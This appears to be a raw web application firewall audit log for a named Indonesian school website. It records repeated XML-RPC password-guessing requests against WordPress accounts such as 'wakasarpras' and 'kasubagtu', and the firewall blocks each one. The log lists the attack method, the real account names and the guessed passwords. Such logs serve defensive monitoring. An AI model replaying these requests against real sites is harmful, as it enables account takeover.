X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a9317d65-C-- wp.getUsersBlogs wakasarpras qwe321 --a9317d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9317d65-E-- --a9317d65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074819538175 5379 (- - -) Stopwatch2: 1745074819538175 5379; combined=4033, p1=480, p2=3280, p3=0, p4=0, p5=156, sr=86, sw=117, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9317d65-Z-- --d4227474-A-- [19/Apr/2025:22:00:41 +0700] aAO6mXNa4dA2HllpK_O5nwAAAJU 103.236.140.4 39200 103.236.140.4 8181 --d4227474-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d4227474-C-- wp.getUsersBlogs wakasarpras 1234%^&* --d4227474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4227474-E-- --d4227474-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074841880902 5151 (- - -) Stopwatch2: 1745074841880902 5151; combined=4051, p1=438, p2=3455, p3=0, p4=0, p5=96, sr=71, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4227474-Z-- --200f0055-A-- [19/Apr/2025:22:01:24 +0700] aAO6xOvDiFC_ir7MDwYlUwAAAFA 103.236.140.4 43348 103.236.140.4 8181 --200f0055-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --200f0055-C-- wp.getUsersBlogs wakasarpras qqii --200f0055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --200f0055-E-- --200f0055-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074884853330 5399 (- - -) Stopwatch2: 1745074884853330 5399; combined=3885, p1=455, p2=3260, p3=0, p4=0, p5=101, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --200f0055-Z-- --29ced913-A-- [19/Apr/2025:22:02:28 +0700] aAO7BEruoUXZj665VUFA6wAAANc 103.236.140.4 49338 103.236.140.4 8181 --29ced913-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --29ced913-C-- wp.getUsersBlogs wakasarpras 212903 --29ced913-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29ced913-E-- --29ced913-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074948641384 5538 (- - -) Stopwatch2: 1745074948641384 5538; combined=3847, p1=478, p2=3186, p3=0, p4=0, p5=109, sr=91, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29ced913-Z-- --6bfff868-A-- [19/Apr/2025:22:03:29 +0700] aAO7QQ6cTFSgLAHl7Pod8gAAAAU 103.236.140.4 54968 103.236.140.4 8181 --6bfff868-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6bfff868-C-- wp.getUsersBlogs wakasarpras maria --6bfff868-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bfff868-E-- --6bfff868-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075009461839 5477 (- - -) Stopwatch2: 1745075009461839 5477; combined=4026, p1=510, p2=3344, p3=0, p4=0, p5=101, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bfff868-Z-- --c6b34b00-A-- [19/Apr/2025:22:04:32 +0700] aAO7gEruoUXZj665VUFEAgAAAMU 103.236.140.4 60570 103.236.140.4 8181 --c6b34b00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6b34b00-C-- wp.getUsersBlogs wakasarpras diamond --c6b34b00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6b34b00-E-- --c6b34b00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075072654731 5532 (- - -) Stopwatch2: 1745075072654731 5532; combined=4044, p1=551, p2=3311, p3=0, p4=0, p5=107, sr=85, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6b34b00-Z-- --f9db2020-A-- [19/Apr/2025:22:05:32 +0700] aAO7vOvDiFC_ir7MDwYqwAAAAEQ 103.236.140.4 37736 103.236.140.4 8181 --f9db2020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f9db2020-C-- wp.getUsersBlogs wakasarpras loveyou --f9db2020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9db2020-E-- --f9db2020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075132082503 5155 (- - -) Stopwatch2: 1745075132082503 5155; combined=3502, p1=427, p2=2918, p3=0, p4=0, p5=94, sr=81, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9db2020-Z-- --e45a6718-A-- [19/Apr/2025:22:06:40 +0700] aAO8AEruoUXZj665VUFHHQAAANY 103.236.140.4 43946 103.236.140.4 8181 --e45a6718-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e45a6718-C-- wp.getUsersBlogs wakasarpras 123456b --e45a6718-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e45a6718-E-- --e45a6718-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075200140562 4546 (- - -) Stopwatch2: 1745075200140562 4546; combined=3249, p1=397, p2=2696, p3=0, p4=0, p5=91, sr=76, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e45a6718-Z-- --8e87cd60-A-- [19/Apr/2025:22:07:41 +0700] aAO8PXNa4dA2HllpK_PCLgAAAIE 103.236.140.4 49578 103.236.140.4 8181 --8e87cd60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8e87cd60-C-- wp.getUsersBlogs kasubagtu kasubagtukasubagtu --8e87cd60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e87cd60-E-- --8e87cd60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075261267700 4807 (- - -) Stopwatch2: 1745075261267700 4807; combined=3607, p1=448, p2=2930, p3=0, p4=0, p5=134, sr=85, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e87cd60-Z-- --38ce4545-A-- [19/Apr/2025:22:08:41 +0700] aAO8eQ6cTFSgLAHl7PolpwAAABM 103.236.140.4 55002 103.236.140.4 8181 --38ce4545-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --38ce4545-C-- wp.getUsersBlogs kasubagtu 123123123 --38ce4545-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38ce4545-E-- --38ce4545-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075321534088 4147 (- - -) Stopwatch2: 1745075321534088 4147; combined=3006, p1=375, p2=2484, p3=0, p4=0, p5=87, sr=72, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38ce4545-Z-- --6600626d-A-- [19/Apr/2025:22:09:51 +0700] aAO8v3Na4dA2HllpK_PE5gAAAI8 103.236.140.4 33654 103.236.140.4 8181 --6600626d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6600626d-C-- wp.getUsersBlogs kasubagtu kasubagtu1991 --6600626d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6600626d-E-- --6600626d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075391312586 5393 (- - -) Stopwatch2: 1745075391312586 5393; combined=4181, p1=534, p2=3425, p3=0, p4=0, p5=129, sr=95, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6600626d-Z-- --75348654-A-- [19/Apr/2025:22:10:54 +0700] aAO8_nNa4dA2HllpK_PGeAAAAI8 103.236.140.4 39982 103.236.140.4 8181 --75348654-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --75348654-C-- wp.getUsersBlogs kasubagtu trustno1 --75348654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75348654-E-- --75348654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075454895108 4974 (- - -) Stopwatch2: 1745075454895108 4974; combined=3540, p1=472, p2=2907, p3=0, p4=0, p5=96, sr=104, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75348654-Z-- --2081d256-A-- [19/Apr/2025:22:11:56 +0700] aAO9POvDiFC_ir7MDwYydgAAAE0 103.236.140.4 45944 103.236.140.4 8181 --2081d256-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2081d256-C-- wp.getUsersBlogs kasubagtu kasubagtu1989 --2081d256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2081d256-E-- --2081d256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075516259482 5232 (- - -) Stopwatch2: 1745075516259482 5232; combined=3905, p1=449, p2=3252, p3=0, p4=0, p5=119, sr=85, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2081d256-Z-- --7fa3ee2b-A-- [19/Apr/2025:22:13:02 +0700] aAO9fuvDiFC_ir7MDwYz_wAAAEc 103.236.140.4 52466 103.236.140.4 8181 --7fa3ee2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7fa3ee2b-C-- wp.getUsersBlogs kasubagtu marketing --7fa3ee2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fa3ee2b-E-- --7fa3ee2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075582245959 5530 (- - -) Stopwatch2: 1745075582245959 5530; combined=4174, p1=404, p2=3562, p3=0, p4=0, p5=121, sr=81, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fa3ee2b-Z-- --8a461b7a-A-- [19/Apr/2025:22:14:12 +0700] aAO9xOvDiFC_ir7MDwY1twAAAFQ 103.236.140.4 59410 103.236.140.4 8181 --8a461b7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8a461b7a-C-- wp.getUsersBlogs kasubagtu martin --8a461b7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a461b7a-E-- --8a461b7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075652899142 5366 (- - -) Stopwatch2: 1745075652899142 5366; combined=3752, p1=469, p2=3105, p3=0, p4=0, p5=104, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a461b7a-Z-- --48812e3d-A-- [19/Apr/2025:22:15:14 +0700] aAO-AuvDiFC_ir7MDwY3vAAAAEo 103.236.140.4 37294 103.236.140.4 8181 --48812e3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48812e3d-C-- wp.getUsersBlogs kasubagtu jessica1 --48812e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48812e3d-E-- --48812e3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
